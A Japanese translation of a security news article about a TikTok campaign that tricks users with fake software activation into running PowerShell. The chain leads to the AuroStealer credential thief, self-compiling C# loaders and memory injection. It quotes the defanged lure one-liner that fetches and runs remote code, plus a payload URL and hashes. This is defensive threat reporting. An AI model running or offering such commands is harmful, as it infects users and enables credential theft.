TikTok Video で拡散するマルウェア:自己コンパイルで検出を回避して PowerShell を実行

Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution

2025/10/17 CyberSecurityNews — TikTok を悪用するサイバー犯罪者たちは、無料のソフトウェア・アクティベーションを装いながら危険なペイロードを配信するという、高度なマルウェア・キャンペーンを展開している。この攻撃は、 ClickFix 手法を彷彿とさせるソーシャル・エンジニアリング戦術を利用するものであり、何も知らないユーザーを騙して、システム上で悪意の PowerShell コマンドを実行させるものだ。

Photoshop などの人気ソフトウェアの無料アクティベーションを提供する、TikTok 動画にユーザーが遭遇するところから、この攻撃チェーンは始まる。そのような動画のひとつは、検知される前に 500 件を超える “いいね!” を獲得していたという。

この攻撃チェーンは、指示に従う被害者が管理者権限で PowerShell を開き、単純に見えるワンライナー・コマンドを実行する段階へと進む。

最初の感染ベクターは、コマンド iex “irm slmgr[.]win/photoshop” を実行するよう被害者に指示するステップである。このコマンドは、リモート・サーバから悪意の PowerShell コードを取得して実行する。

この第1次のペイロード (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) は、 VirusTotal の検出率で 17/63 を記録するという、検出回避の能力を示している。

このスクリプトにより、”hxxps://file-epq[.]pages[.]dev/updater.exe” から “updater.exe” という名の2次実行ファイルがダウンロードされる。分析の結果として判明したのは、このファイルが、機密認証情報やシステム情報を収集するために設計された AuroStealer マルウェアであることだ。

Fake TikTok video (Source – Internet Storm Center)

このキャンペーンを特定した Internet Storm Center の研究者たちは、正規のシステム・プロセスを装うスケジュール・タスクを介して達成される、永続化メカニズムが実装されていることを発見した。

このマルウェアは、MicrosoftEdgeUpdateTaskMachineCore などのタスク名をランダムに選択し、正規の Windows サービスに紛れ込ませることで、ユーザーがログオンするたびの実行を可能にする。

3つ目のペイロードである “source.exe” (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) は、”C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe” にある .NET Framework コンパイラを悪用して、実行時に C# コードをオンデマンドでコンパイルするという、高度な検出回避の手法を取り込んでいる。

自己コンパイル手法とメモリ・インジェクション

この自己コンパイル機能は、従来の検出メカニズムを回避するための高度な手法である。

このマルウェアは、実行時に C# クラスをコンパイルして、VirtualAlloc/CreateThread/WaitForSingleObject などの kernel32.dll 関数をインポートする。

この動的にコンパイルされたコードは、実行可能メモリ空間を割り当て、シェルコードをプロセス・メモリに直接挿入する。つまり、ディスクに追加ファイルを書き込むことなく、悪意のペイロードを実行するための新しいスレッドを作成する。

すでに研究者たちは、このキャンペーンの複数の亜種を TikTok 上で発見している。これらの亜種は、さまざまなソフトウェアの クラック版を探すユーザーを標的としている。この戦術が示すのは、ソフトウェアのダウンロードにおいて信頼できないソースを避けることの重要性である。

TikTok Video を入り口とする巧妙なソーシャル・エンジニアリングが、単純な PowerShell ワンライナー介して深刻な侵害を引き起こしているようです。問題の原因は巧妙なユーザー誘導だけではなく、検出の回避を前提とした多段ペイロード設計にあります。具体的には、リモートからダウンロードするローダー → 認証情報を狙う AuroStealer → .NET コンパイラを悪用した自己コンパイルとメモリ・インジェクションであり、その後に正規プロセス名を偽装する永続化が行われます。よろしければ、カテゴリ SocialEngineering も、ご参照ください。